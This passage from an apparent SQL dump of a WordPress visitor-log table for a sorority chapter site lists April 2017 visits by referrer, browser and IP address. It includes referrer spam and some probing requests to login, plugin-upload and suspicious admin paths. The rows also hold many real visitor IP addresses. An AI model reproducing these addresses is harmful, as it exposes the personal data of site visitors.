2CLambdaGammaZetaChapter','Safari','iPhone','5.1','','61.135.190.220','000',1,0),(3337,'2017-04-19','http://zphiblgz.org','Firefox','Windows','34.0','','180.49.14.127','000',2,0),(3338,'2017-04-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.25.103.69','000',1,0),(3339,'2017-04-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.15.16.4','000',2,0),(3340,'2017-04-19','https://2dm.prohoster.info/domain-registration/domain-whois-lookup.php','MSIE','Windows','6.0','','37.229.253.129','000',3,0),(3341,'2017-04-19','http://zphiblgz.org','Safari','iPhone','8.0','','123.125.71.43','000',1,0),(3342,'2017-04-19','http://zphiblgz.org','Safari','iPhone','8.0','','220.181.108.182','000',1,0),(3343,'2017-04-19','https://search.yahoo.com/','Firefox','Windows','52.0','','72.9.10.27','000',1,0),(3344,'2017-04-19','http://prohoster.info/hosting/constructor','Unknown','Unknown','Unknown','','46.119.118.191','000',3,0),(3345,'2017-04-20','http://zphiblgz.org','Firefox','Windows','34.0','','178.49.152.158','000',4,0),(3346,'2017-04-20','http://zphiblgz.org','Firefox','Windows','34.0','','37.78.184.222','000',2,0),(3347,'2017-04-20','http://zphiblgz.org','Firefox','Windows','34.0','','178.129.250.40','000',2,0),(3348,'2017-04-20','http://zphiblgz.org','Firefox','Windows','40.1','','66.216.249.135','000',1,0),(3349,'2017-04-20','http://zphiblgz.org','Firefox','Windows','40.1','','79.183.132.192','000',2,0),(3350,'2017-04-20','http://zphiblgz.org','Firefox','Windows','51.0','','167.114.233.118','000',2,0),(3351,'2017-04-20','zphiblgz.org','Chrome','Windows','50.0.2661.75','','139.162.37.132','000',5,0),(3352,'2017-04-20','zphiblgz.org','Chrome','Windows','50.0.2661.75','','185.95.122.24','000',1,0),(3353,'2017-04-20','zphiblgz.org','Chrome','Windows','50.0.2661.75','','104.236.18.228','000',2,0),(3354,'2017-04-20','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.187.132.5','000',2,0),(3355,'2017-04-20','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','Firefox','Windows','14.0.1','','5.61.35.40','000',2,0),(3356,'2017-04-20','http://zphiblgz.org','Firefox','Windows','34.0','','176.100.216.254','000',2,0),(3357,'2017-04-20','http://zphiblgz.org','Firefox','Windows','34.0','','193.161.14.175','000',2,0),(3358,'2017-04-20','http://zphiblgz.org','Firefox','Windows','49.0','','104.238.169.101','000',1,0),(3359,'2017-04-20','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(3360,'2017-04-20','http://zphiblgz.org/','Chrome','Windows','39.0.2171.71','','222.186.161.132','000',3,0),(3361,'2017-04-20','http://zphiblgz.org','Chrome','Windows','39.0.2171.71','','192.198.80.227','000',2,0),(3362,'2017-04-20','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.126','000',1,0),(3363,'2017-04-20','http://zphiblgz.org','Firefox','Windows','40.1','','219.92.142.64','000',2,0),(3364,'2017-04-20','http://zphiblgz.org','Firefox','Windows','40.1','','189.120.92.170','000',2,0),(3365,'2017-04-20','http://zphiblgz.org','Firefox','Windows','40.1','','76.69.87.172','000',2,0),(3366,'2017-04-20','http://zphiblgz.org/programs/','Chrome','Android','57.0.2987.132','','75.190.65.166','000',2,0),(3367,'2017-04-20','http://www.bing.com/search?q=gamma+lambda+zeta&form=CMDTDF&pc=CMDTDF&src=IE-SearchBox','MSIE','Windows','11.0','','75.112.142.98','000',2,0),(3368,'2017-04-20','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.25','000',1,0),(3369,'2017-04-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.29','000',1,0),(3370,'2017-04-20','http://zphiblgz.org','Chrome','Android','56.0.2924.87','','100.15.150.202','000',1,0),(3371,'2017-04-20','https://woweb.com.ua/','MSIE','Windows','6.0','','46.118.115.123','000',5,0),(3372,'2017-04-20','http://zphiblgz.org/wp-cron.php?doing_wp_cron=1492712884.0469000339508056640625','WordPress','Unknown','4.7.3','','74.220.219.51','000',1,0),(3373,'2017-04-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(3374,'2017-04-20','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(3375,'2017-04-20','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','207.76.142.9','000',4,0),(3376,'2017-04-20','http://zphiblgz.org','Firefox','Windows','40.1','','93.143.245.214','000',2,0),(3377,'2017-04-20','http://zphiblgz.org','MSIE','Windows','9.0','','54.144.235.255','000',38,0),(3378,'2017-04-20','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','208.76.113.2','000',2,0),(3379,'2017-04-20','http://zphiblgz.org','Firefox','Windows','24.0','','136.243.67.139','000',1,0),(3380,'2017-04-20','http://zphiblgz.org','Chrome','Windows','34.0.1847.3','','136.243.67.139','000',1,0),(3381,'2017-04-20','http://zphiblgz.org','Firefox','Windows','40.1','','50.148.146.144','000',1,0),(3382,'2017-04-20','http://zphiblgz.org','Firefox','Windows','40.1','','200.120.7.175','000',2,0),(3383,'2017-04-20','http://zphiblgz.org','Firefox','Windows','34.0','','31.163.82.161','000',2,0),(3384,'2017-04-20','http://zphiblgz.org','Firefox','Linux','27.0','','23.94.4.139','000',2,0),(3385,'2017-04-20','https://www.google.com/','Chrome','Windows','57.0.2987.133','','66.169.126.97','000',1,0),(3386,'2017-04-20','http://zphiblgz.org','Safari','iPhone','10.0','','73.213.22.160','000',1,0),(3387,'2017-04-20','http://zphiblgz.org','Firefox','Windows','34.0','','5.166.88.28','000',2,0),(3388,'2017-04-20','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','192.99.147.201','000',1,0),(3389,'2017-04-21','http://zphiblgz.org','Firefox','Windows','40.1','','203.106.78.114','000',2,0),(3390,'2017-04-21','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.54','000',1,0),(3391,'2017-04-21','http://zphiblgz.org','Firefox','Windows','34.0','','176.126.30.143','000',2,0),(3392,'2017-04-21','https://glicol.kz/','MSIE','Windows','6.0','','46.119.118.191','000',3,0),(3393,'2017-04-21','http://zphiblgz.org','Firefox','Windows','34.0','','46.172.18.15','000',2,0),(3394,'2017-04-21','http://investyb.com/','MSIE','Windows','6.0','','46.118.126.252','000',1,0),(3395,'2017-04-21','http://zphiblgz.org','Firefox','Windows','40.1','','105.184.43.148','000',2,0),(3396,'2017-04-21','http://zphiblgz.org','Firefox','Windows','40.1','','103.255.112.4','000',1,0),(3397,'2017-04-21','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.29','000',1,0),(3398,'2017-04-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.27','000',1,0),(3399,'2017-04-21','http://zphiblgz.org/','Chrome','Windows','39.0.2171.95','','69.50.181.85','000',3,0),(3400,'2017-04-21','http://zphiblgz.org/','Opera','Windows','12.17','','69.50.181.85','000',6,0),(3401,'2017-04-21','http://zphiblgz.org','Chrome','Windows','39.0.2171.95','','192.198.80.227','000',2,0),(3402,'2017-04-21','http://zphiblgz.org','MSIE','Windows','11.0','','89.248.172.48','000',1,0),(3403,'2017-04-21','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.12','000',1,0),(3404,'2017-04-21','http://zphiblgz.org','Firefox','Windows','34.0','','194.15.117.19','000',2,0),(3405,'2017-04-21','http://krasnodar-avtolombards.ru/','MSIE','Windows','6.0','','37.229.253.129','000',3,0),(3406,'2017-04-21','http://zphiblgz.org','Firefox','Windows','34.0','','178.49.152.2','000',2,0),(3407,'2017-04-21','http://zphiblgz.org','Firefox','Windows','40.1','','177.182.105.1','000',1,0),(3408,'2017-04-21','http://zphiblgz.org','Firefox','Windows','40.1','','88.66.202.240','000',2,0),(3409,'2017-04-21','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','123.125.67.218','000',1,0),(3410,'2017-04-21','http://r.search.yahoo.com/_ylt=A86.J767N_pYuj0AFWkPxQt.;_ylu=X3oDMTByN3UwbTk1BGNvbG8DZ3ExBHBvcwM5BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1492822076/RO=10/RU=http%3a%2f%2fzphiblgz.org%2f/RK=0/RS=nkjxCkXIg4uzab9BVw_YbAqE_C0-','Firefox','Windows','52.0','','140.158.41.40','000',7,0),(3411,'2017-04-21','http://zphiblgz.org','Firefox','Windows','40.1','','45.120.112.88','000',1,0),(3412,'2017-04-21','http://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','54.245.183.232','000',2,0),(3413,'2017-04-21','http://zphiblgz.org','Firefox','Windows','34.0','','46.250.74.79','000',2,0),(3414,'2017-04-21','http://zphiblgz.org','Firefox','Windows','34.0','','85.115.224.203','000',2,0),(3415,'2017-04-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(3416,'2017-04-21','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(3417,'2017-04-21','http://zphiblgz.org','Safari','iPhone','10.0','','166.216.165.92','000',1,0),(3418,'2017-04-21','http://zpharm.de/sites/lb/05_pharma_firmen.htm','Firefox','Windows','43.0','','188.129.236.68','000',2,0),(3419,'2017-04-21','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','123.125.67.164','000',1,0),(3420,'2017-04-21','http://zphiblgz.org/programs/','Chrome','Android','57.0.2987.132','','108.70.194.5','000',1,0),(3421,'2017-04-21','https://www.google.com/','Chrome','Android','44.0.2403.133','','75.176.169.203','000',1,0),(3422,'2017-04-21','http://zphiblgz.org','Firefox','Windows','34.0','','85.140.231.159','000',2,0),(3423,'2017-04-21','http://intimshop-fantasy.ru/','MSIE','Windows','6.0','','46.118.115.123','000',2,0),(3424,'2017-04-21','http://krasnodar.nodup.ru/','MSIE','Windows','6.0','','46.119.112.125','000',9,0),(3425,'2017-04-21','http://ivanstroi.ru/','MSIE','Unknown','7.0b','','46.119.118.191','000',3,0),(3426,'2017-04-21','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.45.183','000',1,0),(3427,'2017-04-21','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.49.215','000',1,0),(3428,'2017-04-21','https://www.google.com/','Chrome','Windows','56.0.2924.87','','172.5.221.74','000',1,0),(3429,'2017-04-21','http://xn--80aodinpgi.xn--p1ai/','Opera','Windows','9.01','','46.118.115.123','000',3,0),(3430,'2017-04-21','http://zphiblgz.org','Firefox','Windows','34.0','','213.24.134.184','000',2,0),(3431,'2017-04-22','http://zphiblgz.org','Chrome','Windows','39.0.2171.95','','69.50.181.85','000',1,0),(3432,'2017-04-22','http://xn----7sbbagbq7bd5aheftfllo4m.xn--p1ai/','Opera','Windows','7.11','','46.118.126.252','000',6,0),(3433,'2017-04-22','http://zphiblgz.org','Firefox','Windows','34.0','','178.49.152.158','000',4,0),(3434,'2017-04-22','http://zphiblgz.org','Firefox','Windows','40.1','','5.44.169.154','000',2,0),(3435,'2017-04-22','http://zphiblgz.org','Firefox','Windows','34.0','','88.200.137.207','000',2,0),(3436,'2017-04-22','https://www.aquarium-pro.ru/','MSIE','Windows','6.0','','46.119.112.125','000',2,0),(3437,'2017-04-22','http://zphiblgz.org','Firefox','Windows','34.0','','90.188.6.161','000',2,0),(3438,'2017-04-22','http://zphiblgz.org','Firefox','Windows','34.0','','5.140.23.227','000',2,0),(3439,'2017-04-22','http://zphiblgz.org','Firefox','Windows','40.1','','105.98.133.19','000',2,0),(3440,'2017-04-22','http://zphiblgz.org','Firefox','Windows','40.1','','218.186.207.9','000',1,0),(3441,'2017-04-22','http://zphiblgz.org','Chrome','Windows','28.0.1500.95','','54.157.4.230','000',2,0),(3442,'2017-04-22','http://zphiblgz.org','Firefox','Windows','49.0','','62.210.129.246','000',1,0),(3443,'2017-04-22','https://www.google.com/','Safari','iPhone','10.0','','67.8.231.58','000',1,0),(3444,'2017-04-22','http://zphiblgz.org','Firefox','Windows','17.0','','5.189.204.71','000',1,0),(3445,'2017-04-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','5.141.121.151','000',2,0),(3446,'2017-04-22','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.121.151','000',10,0),(3447,'2017-04-22','http://zphiblgz.org','Firefox','Windows','40.1','','175.137.97.216','000',1,0),(3448,'2017-04-22','http://zphiblgz.org','Firefox','Windows','34.0','','217.118.95.113','000',2,0),(3449,'2017-04-22','http://prohoster.info/vps/abuzoustojchivye-vps','Opera','Windows','8.01','','46.119.118.191','000',3,0),(3450,'2017-04-22','http://zphiblgz.org','Firefox','Windows','34.0','','69.50.181.85','000',1,0),(3451,'2017-04-22','http://zphiblgz.org','Firefox','Windows','40.1','','151.230.117.85','000',1,0),(3452,'2017-04-22','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.127.196','000',4,0),(3453,'2017-04-22','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.125.248','000',4,0),(3454,'2017-04-22','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','123.125.67.218','000',1,0),(3455,'2017-04-22','http://zpharm.de/sites/lb/05_pharma_firmen.htm','Firefox','Windows','43.0','','188.129.236.68','000',3,0),(3456,'2017-04-22','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.121.139','000',4,0),(3457,'2017-04-22','http://zphiblgz.org','Firefox','Windows','40.1','','223.186.25.132','000',2,0),(3458,'2017-04-22','http://zphiblgz.org','Firefox','Windows','40.1','','189.82.161.121','000',2,0),(3459,'2017-04-22','http://nagdak.ru/','Unknown','Unknown','Unknown','','37.229.253.129','000',3,0),(3460,'2017-04-22','http://zphiblgz.org','Firefox','Windows','29.0','','94.51.148.214','000',6,0),(3461,'2017-04-22','http://zphiblgz.org','Firefox','Windows','29.0','','31.162.70.92','000',10,0),(3462,'2017-04-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(3463,'2017-04-22','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(3464,'2017-04-22','http://zphiblgz.org','Firefox','Windows','40.1','','103.196.137.189','000',1,0),(3465,'2017-04-22','http://zphiblgz.org','Firefox','Windows','29.0','','178.46.98.145','000',2,0),(3466,'2017-04-22','http://zphiblgz.org','Firefox','Windows','29.0','','31.162.74.168','000',4,0),(3467,'2017-04-22','https://www.google.com/','Safari','iPhone','10.0','','192.149.13.37','000',1,0),(3468,'2017-04-22','https://www.google.com/','Edge','Windows','14.14393','','72.81.227.12','000',1,0),(3469,'2017-04-22','http://sankt-peterburg.nodup.ru/','Opera','Windows','7.02','','46.118.115.123','000',3,0),(3470,'2017-04-22','https://woweb.com.ua/','MSIE','Windows','6.0','','46.118.115.123','000',3,0),(3471,'2017-04-22','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.203.19.93','000',1,0),(3472,'2017-04-22','http://zphiblgz.org/programs/','Safari','iPhone','10.0','','69.251.111.201','000',1,0),(3473,'2017-04-22','http://zphiblgz.org','Firefox','Windows','40.1','','134.196.11.170','000',2,0),(3474,'2017-04-22','http://zphiblgz.org','Firefox','Windows','29.0','','188.18.114.219','000',6,0),(3475,'2017-04-22','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.122.4','000',4,0),(3476,'2017-04-23','http://zphiblgz.org','Firefox','Windows','34.0','','5.164.141.10','000',2,0),(3477,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.122.4','000',2,0),(3478,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','188.17.193.207','000',4,0),(3479,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','188.18.115.44','000',2,0),(3480,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','188.18.115.220','000',6,0),(3481,'2017-04-23','http://hvd-store.com/','Chrome','Linux','37.0.2062.120','','192.36.27.4','000',1,0),(3482,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','94.51.110.100','000',6,0),(3483,'2017-04-23','http://8xv8.com/','MSIE','Windows','2.0','','46.119.118.191','000',3,0),(3484,'2017-04-23','http://zphiblgz.org','Android Browser','Android','4.0','','192.36.27.4','000',8,0),(3485,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.121.58','000',2,0),(3486,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.127.229','000',4,0),(3487,'2017-04-23','http://zphiblgz.org','Firefox','Windows','34.0','','78.25.120.1','000',2,0),(3488,'2017-04-23','http://zphiblgz.org','Firefox','Windows','10.0.1','','31.202.212.95','000',1,0),(3489,'2017-04-23','http://zphiblgz.org','Firefox','Windows','10.0.1','','31.202.241.227','000',1,0),(3490,'2017-04-23','http://zphiblgz.org','Firefox','Windows','10.0.1','','91.250.15.107','000',1,0),(3491,'2017-04-23','http://zphiblgz.org','Firefox','Windows','34.0','','94.50.198.64','000',2,0),(3492,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.225.242','000',4,0),(3493,'2017-04-23','http://zphiblgz.org/','Firefox','Windows','35.0','','23.88.141.58','000',1,0),(3494,'2017-04-23','http://zphiblgz.org/','Opera','Windows','12.17','','23.88.141.58','000',4,0),(3495,'2017-04-23','http://zphiblgz.org','Firefox','Windows','40.1','','1.23.231.203','000',1,0),(3496,'2017-04-23','http://zphiblgz.org','Firefox','Windows','34.0','','178.169.87.23','000',2,0),(3497,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.91.187','000',4,0),(3498,'2017-04-23','http://zphiblgz.org','Chrome','Linux','12.0.742.112','','94.23.40.23','000',2,0),(3499,'2017-04-23','http://zphiblgz.org','Firefox','Windows','40.1','','126.28.87.8','000',2,0),(3500,'2017-04-23','https://www.google.com/','Chrome','Android','57.0.2987.132','','100.14.181.228','000',5,0),(3501,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.224.247','000',4,0),(3502,'2017-04-23','http://zphiblgz.org','Firefox','Windows','34.0','','213.24.135.78','000',2,0),(3503,'2017-04-23','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','188.32.176.44','000',1,0),(3504,'2017-04-23','https://www.google.com/','Safari','iPhone','10.0','','66.87.81.100','000',1,0),(3505,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.126.188','000',6,0),(3506,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','90.151.131.25','000',12,0),(3507,'2017-04-23','http://zphiblgz.org','Firefox','Windows','34.0','','212.116.102.42','000',2,0),(3508,'2017-04-23','https://2dm.prohoster.info/domain-registration/index.php','MSIE','Windows','6.0','','37.229.253.129','000',3,0),(3509,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','31.162.111.139','000',8,0),(3510,'2017-04-23','http://zphiblgz.org','Firefox','Windows','40.1','','87.103.45.223','000',1,0),(3511,'2017-04-23','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','104.254.244.80','000',7,0),(3512,'2017-04-23','http://zphiblgz.org','MSIE','Windows','10.0','','104.254.244.80','000',1,0),(3513,'2017-04-23','http://zphiblgz.org','Unknown','Unknown','Unknown','','104.254.244.80','000',1,0),(3514,'2017-04-23','http://zphiblgz.org','Firefox','Windows','40.1','','168.167.35.66','000',2,0),(3515,'2017-04-23','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.119','000',1,0),(3516,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','31.162.82.98','000',4,0),(3517,'2017-04-23','http://zphiblgz.org','Firefox','Windows','4.0','','34.207.10.36','000',1,0),(3518,'2017-04-23','http://zphiblgz.org','Firefox','Windows','34.0','','176.14.158.151','000',2,0),(3519,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.120.184','000',6,0),(3520,'2017-04-23','http://zphiblgz.org','Firefox','Windows','34.0','','103.58.6.102','000',2,0),(3521,'2017-04-23','http://mygameplus.ru/','Opera','Windows','6.01','','46.119.118.191','000',2,0),(3522,'2017-04-23','http://zphiblgz.org','Firefox','Windows','49.0','','89.31.57.5','000',1,0),(3523,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','31.162.96.225','000',4,0),(3524,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','90.151.139.250','000',4,0),(3525,'2017-04-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(3526,'2017-04-23','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(3527,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','31.162.99.186','000',6,0),(3528,'2017-04-23','http://zphiblgz.org','Firefox','Windows','34.0','','59.89.240.230','000',2,0),(3529,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.127.249','000',6,0),(3530,'2017-04-23','https://groupmoney.ru/','MSIE','Windows','6.0','','46.118.126.252','000',2,0),(3531,'2017-04-23','http://zphiblgz.org','Firefox','Windows','29.0','','178.46.126.78','000',12,0),(3532,'2017-04-23','http://zphiblgz.org','Chrome','Windows','22.0.1229.79','','185.110.132.213','000',2,0),(3533,'2017-04-23','http://zphiblgz.org','Firefox','Windows','34.0','','5.167.84.213','000',2,0),(3534,'2017-04-23','http://zphiblgz.org','Firefox','Windows','34.0','','80.251.112.205','000',2,0),(3535,'2017-04-23','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiNyJ782rvTAhWm6oMKHbbnBmwQFggiMAA&url=http%3A%2F%2Fzphiblgz.org%2F&usg=AFQjCNHl6iFFa_3VuMKJmTgYMIkup1fP8Q','MSIE','Windows','11.0','','71.179.255.135','000',8,0),(3536,'2017-04-23','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.83.166','000',7,0),(3537,'2017-04-23','http://purchasepillsnorx.com/','Unknown','Unknown','Unknown','','46.118.115.123','000',3,0),(3538,'2017-04-23','https://www.bing.com/','Edge','Windows','14.14393','','162.201.238.5','000',1,0),(3539,'2017-04-23','https://www.google.com/','Chrome','Macintosh','57.0.2987.133','','96.244.61.48','000',2,0),(3540,'2017-04-24','https://www.google.com/','Chrome','Windows','57.0.2987.133','','108.91.81.12','000',3,0),(3541,'2017-04-24','http://zphiblgz.org','Chrome','Windows','23.0.1271.17','','185.110.132.213','000',2,0),(3542,'2017-04-24','http://zphiblgz.org','Firefox','Windows','34.0','','31.8.198.57','000',2,0),(3543,'2017-04-24','https://en.altezza.travel/','MSIE','Windows','6.0','','46.118.115.123','000',8,0),(3544,'2017-04-24','http://zphiblgz.org','Firefox','Windows','34.0','','77.39.102.170','000',2,0),(3545,'2017-04-24','http://zphiblgz.org','Chrome','Linux','5.0.342.1','','188.165.234.68','000',111,0),(3546,'2017-04-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','216.51.232.61','000',1,0),(3547,'2017-04-24','http://zphiblgz.org/wp-admin/css/logo_img.php','Chrome','Windows','5.0.375.99','','78.110.50.104','000',15,0),(3548,'2017-04-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','89.42.216.164','000',1,0),(3549,'2017-04-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','216.64.158.69','000',1,0),(3550,'2017-04-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','37.59.22.77','000',1,0),(3551,'2017-04-24','http://xn--80aebbcbcdemfkhba4byaehoejh8dza3v.xn--p1ai/','Opera','Windows','7.0','','46.119.112.125','000',5,0),(3552,'2017-04-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','23.91.71.213','000',1,0),(3553,'2017-04-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','112.78.125.45','000',1,0),(3554,'2017-04-24','http://zphiblgz.org','Firefox','Windows','34.0','','78.36.253.53','000',2,0),(3555,'2017-04-24','http://zphiblgz.org','Firefox','Windows','40.1','','157.51.33.19','000',1,0),(3556,'2017-04-24','http://zphiblgz.org/wp-login.php','Firefox','Windows','50.0','','211.47.69.73','000',1,0),(3557,'2017-04-24','http://rybalka-opt.ru/','MSIE','Windows','6.0','','46.119.118.191','000',5,0),(3558,'2017-04-24','http://zphiblgz.org','Firefox','Windows','40.1','','108.44.146.37','000',1,0),(3559,'2017-04-24','http://zphiblgz.org','Firefox','Windows','34.0','','213.24.126.169','000',2,0),(3560,'2017-04-24','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(3561,'2017-04-24','http://zphiblgz.org','Firefox','Windows','34.0','','92.126.57.95','000',2,0),(3562,'2017-04-24','http://zphiblgz.org','Firefox','Windows','34.0','','85.26.234.213','000',1,0),(3563,'2017-04-24','http://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',1,0),(3564,'2017-04-24','http://zphiblgz.org','Firefox','Windows','34.0','','213.87.129.162','000',2,0),(3565,'2017-04-24','http://zphiblgz.org','Firefox','Windows','29.0','','178.46.126.78','000',4,0),(3566,'2017-04-24','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiIl_3jxr3TAhXHJiYKHdmsCu0QFgghMAA&url=http%3A%2F%2Fzphiblgz.org%2Fscholarship%2F&usg=AFQjCNGGuWy2KSIOcbzM6-Bb9Xl9Kf1gjQ','MSIE','Windows','11.0','','205.222.248.81','000',1,0),(3567,'2017-04-24','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.124.216','000',4,0),(3568,'2017-04-24','http://zphiblgz.org','Firefox','Windows','34.0','','176.59.214.187','000',2,0),(3569,'2017-04-24','http://zphiblgz.org','Chrome','Windows','19.0.1084.56','','77.123.2.4','000',1,0),(3570,'2017-04-24','http://zphiblgz.org/wp-content/plugins/fluid_forms/file-upload/server/php/','Chrome','Windows','42.0.2311.152','','216.244.85.106','000',1,0),(3571,'2017-04-24','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.126.9','000',4,0),(3572,'2017-04-24','http://nagdak.ru/','MSIE','Windows','6.0','','46.118.126.252','000',3,0),(3573,'2017-04-24','http://zphiblgz.org','Firefox','Windows','34.0','','95.78.225.61','000',2,0),(3574,'2017-04-24','http://zphiblgz.org','Firefox','Windows','29.0','','31.162.99.221','000',10,0),(3575,'2017-04-24','http://zphiblgz.org','MSIE','Windows','6.0','','109.108.33.59','000',1,0),(3576,'2017-04-24','http://jjbabskoe.ru/','Opera','Windows','7.54','','46.119.112.125','000',1,0),(3577,'2017-04-24','http://zphiblgz.org','Firefox','Windows','34.0','','5.138.86.136','000',2,0),(3578,'2017-04-24','http://zphiblgz.org','Firefox','Windows','34.0','','85.26.233.214','000',2,0),(3579,'2017-04-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(3580,'2017-04-24','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(3581,'2017-04-24','http://zphiblgz.org','Firefox','Windows','29.0','','5.141.89.136','000',6,0),(3582,'2017-04-24','http://xn------7cdbapdecfd4ak1bn0amjffj7afu3y.xn--p1ai/','Unknown','Unknown','Unknown','','46.118.126.252','000',3,0),(3583,'2017-04-24','http://zphiblgz.org','Firefox','Windows','29.0','','188.16.2.204','000',2,0),(3584,'2017-04-24','https://2dm.prohoster.info/domain-registration/domain-whois-lookup.php','MSIE','Windows','6.0','','37.229.253.129','000',3,0),(3585,'2017-04-24','http://zphiblgz.org','Firefox','Windows','52.0','','108.31.253.77','000',4,0),(3586,'2017-04-24','http://zphiblgz.org','Firefox','Windows','29.0','','31.162.82.112','000',2,0),(3587,'2017-04-24','http://zphiblgz.org','Firefox','Windows','29.0','','178.46.86.33','000',4,0),(3588,'2017-04-24','http://zpharm.de/sites/lb/05_pharma_firmen.htm','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(3589,'2017-04-24','http://zphiblgz.org','Firefox','Windows','29.0','','178.46.90.26','000',7,0),(3590,'2017-04-24','https://www.google.com/','Edge','Windows','14.14393','','72.81.227.12','000',1,0),(3591,'2017-04-24','http://zphiblgz.org','Firefox','Windows','29.0','','90.151.142.35','000',6,0),(3592,'2017-04-24','http://zphiblgz.org/event/ms-walk-2017/','Chrome','Windows','47.0.2526.111','','193.201.225.139','000',1,0),(3593,'2017-04-24','http://zphiblgz.org','Firefox','Windows','29.0','','31.162.85.222','000',8,0),(3594,'2017-04-24','http://zphiblgz.org','Firefox','Windows','29.0','','94.51.158.248','000',2,0),(3595,'2017-04-24','http://zphiblgz.org','Firefox','Windows','29.0','','31.162.98.43','000',6,0),(3596,'2017-04-24','http://www.zphibmaryland.org/chapters/','Chrome','Macintosh','57.0.2987.133','','68.132.180.139','000',2,0),(3597,'2017-04-25','https://www.google.com/','Chrome','Macintosh','57.0.2987.133','','73.93.66.45','000',1,0),(3598,'2017-04-25','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.23','000',1,0),(3599,'2017-04-25','http://zphiblgz.org','Firefox','Windows','40.1','','87.20.134.99','000',1,0),(3600,'2017-04-25','http://zphiblgz.org','MSIE','Windows','11.0','','23.229.31.99','000',1,0),(3601,'2017-04-25','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','45.57.236.77','000',1,0),(3602,'2017-04-25','http://www.google.com/','Chrome','Android','57.0.2987.132','','76.106.101.221','000',3,0),(3603,'2017-04-25','http://zphiblgz.org','Firefox','Windows','40.1','','103.210.134.241','000',2,0),(3604,'2017-04-25','http://zphiblgz.or